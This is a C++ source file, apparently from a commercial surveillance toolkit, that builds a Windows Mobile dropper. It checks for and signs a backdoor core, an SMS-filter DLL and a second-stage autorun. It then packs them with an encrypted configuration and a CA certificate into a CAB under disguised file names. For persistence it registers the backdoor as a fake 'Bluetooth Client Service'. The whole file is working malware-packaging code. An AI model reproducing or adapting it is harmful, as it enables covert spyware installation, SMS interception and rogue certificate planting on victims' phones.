RCSMDropper/RCSWinMoDropper.cpp
#include "stdafx.h"
#include <Windows.h>
#include "dropper.h"
extern BOOL SignMobileComponent(TCHAR *wsFile, TCHAR *wsCert);
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hFile;
BYTE *pBlockPtr = NULL;
WCHAR wsCoreFile[MAX_PATH];
WCHAR wsSmsFile[MAX_PATH];
WCHAR wsSecondFile[MAX_PATH];
WCHAR wsConfigFile[MAX_PATH];
WCHAR wsCertFile[MAX_PATH];
WCHAR wsPFXFile[MAX_PATH];
WCHAR wsOutFile[MAX_PATH];
unsigned int iLen = 0;
if (argc != 8) {
printf("ERROR: \n");
printf(" usage: RCSWinMoDropper.exe <core> <smsfilter> <secondstage> <config> <cert> <pfx> <output>\n\n");
printf(" <core> is the backdoor signed core\n");
printf(" <smsfilter> is the smsfilter dll\n");
printf(" <secondstage> is the second stage autorun\n");
printf(" <config> is the backdoor encrypted configuration\n");
printf(" <cert> is the CA cert to be dropped\n");
printf(" <pfx> is the private key for the signing process\n");
printf(" <output> is the output file\n\n");
return 0;
}
wsprintf(wsCoreFile, L"%s", argv[1]);
wsprintf(wsSmsFile, L"%s", argv[2]);
wsprintf(wsSecondFile, L"%s", argv[3]);
wsprintf(wsConfigFile, L"%s", argv[4]);
wsprintf(wsCertFile, L"%s", argv[5]);
wsprintf(wsPFXFile, L"%s", argv[6]);
wsprintf(wsOutFile, L"%s", argv[7]);
/************************************************************************/
/* SANITY CHECKS */
/************************************************************************/
if ( (hFile = CreateFile(wsCoreFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find Core file [%S]\n", wsCoreFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
if ( (hFile = CreateFile(wsSmsFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find SMS filter file [%S]\n", wsSmsFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
if ( (hFile = CreateFile(wsSecondFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find Second Stage file [%S]\n", wsSecondFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
if ( (hFile = CreateFile(wsConfigFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find Config file [%S]\n", wsConfigFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
if ( (hFile = CreateFile(wsCertFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find Cert file [%S]\n", wsCertFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
if ( (hFile = CreateFile(wsPFXFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
printf("Cannot find PFX file [%S]\n", wsPFXFile);
return ERROR_EMBEDDING;
} else {
CloseHandle(hFile);
}
/************************************************************************/
/* READY TO GO */
/************************************************************************/
printf("Ready to go...\n");
printf("CORE [%S]\n", wsCoreFile);
printf("SMSFILTER [%S]\n", wsSmsFile);
printf("SECOND STAGE [%S]\n", wsSecondFile);
printf("CONFIG [%S]\n", wsConfigFile);
printf("CERT FILE [%S]\n", wsCertFile);
printf("OUTPUT [%S]\n\n", wsOutFile);
/************************************************************************/
/* SIGNING */
/************************************************************************/
WCHAR wsDropPath[MAX_PATH];
if (SignMobileComponent(wsSmsFile, wsPFXFile)) {
printf("Using PFX to sign SMS filter... ok\n");
} else {
printf("Cannot sign with PFX file [%S]\n", wsPFXFile);
return ERROR_EMBEDDING;
}
if (SignMobileComponent(wsSecondFile, wsPFXFile)) {
printf("Using PFX to sign Second Stage... ok\n");
} else {
printf("Cannot sign with PFX file [%S]\n", wsPFXFile);
return ERROR_EMBEDDING;
}
/************************************************************************/
/* CAB GENERATION */
/************************************************************************/
wsprintf(wsDropPath, L"\\Windows\\autorun2.exe");
if (AddFile(wsDropPath, wsSecondFile)) {
printf("Adding Second Stage to cab... ok\n");
} else {
printf("Cannot add Second Stage to cab [%S]\n", wsSecondFile);
return ERROR_EMBEDDING;
}
wsprintf(wsDropPath, L"\\Windows\\bthclient.dll");
if (AddFile(wsDropPath, wsCoreFile)) {
printf("Adding Core to cab... ok\n");
} else {
printf("Cannot add Core to cab [%S]\n", wsCoreFile);
return ERROR_EMBEDDING;
}
wsprintf(wsDropPath, L"\\Windows\\SmsFilter.dll");
if (AddFile(wsDropPath, wsSmsFile)) {
printf("Adding SMS filter to cab... ok\n");
} else {
printf("Cannot add SMS filter to cab [%S]\n", wsSmsFile);
return ERROR_EMBEDDING;
}
wsprintf(wsDropPath, L"\\Windows\\$MS313Mobile\\cptm511.dql");
if (AddFile(wsDropPath, wsConfigFile)) {
printf("Adding Config to cab... ok\n");
} else {
printf("Cannot add Config to cab [%S]\n", wsConfigFile);
return ERROR_EMBEDDING;
}
wsprintf(wsDropPath, L"cert.cer");
if (AddFile(wsDropPath, wsCertFile)) {
printf("Adding Cert to cab... ok\n");
} else {
printf("Cannot add Cert to cab [%S]\n", wsCertFile);
return ERROR_EMBEDDING;
}
WCHAR wsKeyPath[MAX_PATH];
WCHAR wsDLL[MAX_PATH];
WCHAR *wsCore = L"bthclient";
BOOL ret = TRUE;
// Add reg key to cabinet
wsprintf(wsKeyPath, L"Services\\%s", wsCore);
ret &= AddRegistryKey(HKEY_LOCAL_MACHINE, wsKeyPath);
wsprintf(wsKeyPath, L"Services\\%s\\FriendlyName", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"Bluetooth Client", 0);
wsprintf(wsKeyPath, L"Services\\%s\\Dll", wsCore);
wsprintf(wsDLL, L"%s.dll", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)wsDLL, 0);
wsprintf(wsKeyPath, L"Services\\%s\\Order", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)9, 0);
wsprintf(wsKeyPath, L"Services\\%s\\Index", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)0, 0);
wsprintf(wsKeyPath, L"Services\\%s\\Keep", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)1, 0);
wsprintf(wsKeyPath, L"Services\\%s\\Prefix", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"BTC", 0);
wsprintf(wsKeyPath, L"Services\\%s\\Description", wsCore);
ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"Bluetooth Client Service", 0);
ret &= RegService(L"BTC", wsCore, 0);
if (!ret) {
printf("Cannot write registry informations\n");
return ERROR_EMBEDDING;
}
if (CreateArchive(wsOutFile)) {
printf("Output file... ok\n");
} else {
printf("Cannot create output file [%S]\n", wsOutFile);
DeleteFile(wsOutFile);
return ERROR_EMBEDDING;
}
return ERROR_SUCCESS;
}